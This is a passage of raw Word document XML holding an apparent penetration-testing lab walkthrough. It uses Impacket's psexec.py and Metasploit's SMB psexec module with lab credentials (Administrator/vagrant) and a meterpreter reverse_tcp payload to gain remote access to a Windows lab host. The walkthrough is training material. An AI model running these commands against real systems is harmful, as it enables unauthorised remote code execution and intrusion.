        <w:t xml:space="preserve">We can now run the psexec.py with the username </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>Administrator .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve"> This can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01420135" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C350387" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve">python3 psexec.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>Administrator@demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78D53180" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:lastRenderedPageBreak/>
        <w:t>As shown in the following screenshot, you will be prompted to provide the password for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:t> user, which in this case is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vagrant</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D8F08A" w14:textId="0A9ED5B4" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00BB23B8" w:rsidP="00D8427E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A790960" wp14:editId="2D7724C6">
            <wp:extent cx="5766096" cy="4483330"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="117824838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248385" name="Picture 1178248385"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5766096" cy="4483330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E90AD7C" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>As shown in the preceding screenshot, after successful authentication, you will be provided with remote access to the Windows target as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:t> user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5C2F3C" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>We can also utilize the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve"> Metasploit module to obtain a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve"> session on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8CEBAF" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>We will first need to start the Metasploit Framework Console (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>), this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3A7F14" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7229E852" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CC28B9F" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>We can then load the module, by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E733A16" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05884A58" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5898B81B" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:lastRenderedPageBreak/>
        <w:t>After loading the module, we will need to configure the module options, in this case, we will need to set the target address and the SMB credentials for authentication. This can be done by running the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DBCF1A" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA51CD9" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="355062CF" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EB7EF5" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>SMBUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve"> Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50725C16" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E43A516" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>SMBPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve"> vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142128D1" w14:textId="30D7C94B" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00BB23B8" w:rsidP="00D8427E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61520A7A" wp14:editId="09CD5862">
            <wp:extent cx="5607338" cy="4451579"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="108310727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107274" name="Picture 1083107274"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5607338" cy="4451579"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57279C03" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve">We will also need to change the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve"> payload, this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259900E0" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C3466C" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:lastRenderedPageBreak/>
        <w:t>set payload windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53718E27" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve">After configuring the module </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t>options</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t xml:space="preserve"> we can execute the module by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46673DD1" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BB57FE" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B4F51" w14:textId="7AC5CB82" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00BB23B8" w:rsidP="00D8427E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="111D3B7B" wp14:editId="1FD94D95">
            <wp:extent cx="5874052" cy="2425825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="184118105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181056" name="Picture 1841181056"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5874052" cy="2425825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="178E9811" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRPr="00D8427E" w:rsidRDefault="00D8427E" w:rsidP="00D8427E">
      <w:r w:rsidRPr="00D8427E">
        <w:t>As shown in the following screenshot, if successful, the module will authenticate with the Windows target via SMB with the credentials you specified and will execute a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8427E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8427E">
        <w:t> payload on the target system consequently providing you with remote access on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFADF4C" w14:textId="77777777" w:rsidR="00D8427E" w:rsidRDefault="00D8427E"/>
    <w:sectPr w:rsidR="00D842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8843F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F9E2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878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0B8"/>
    <w:rsid w:val="002300B8"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00BB23B8"/>
    <w:rsid w:val="00C67C88"/>
    <w:rsid w:val="00D842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A434D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{895C2630-2445-41EC-B05B-47B1F17DE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00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00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00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00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00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00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00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00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00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00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00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00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00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00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00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00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00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00B8"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="002300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00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00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00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00B8"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="002300B8"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="002300B8"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="002300B8"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="002300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00B8"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="002300B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tmp"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.tmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.tmp"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.tmp"/><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tmp"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.tmp"/><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tmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.tmp"/><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9</Pages>
  <Words>853</Words>
  <Characters>4346</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>140</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umar farooq</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>umar farooq</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-20T06:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-20T06:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>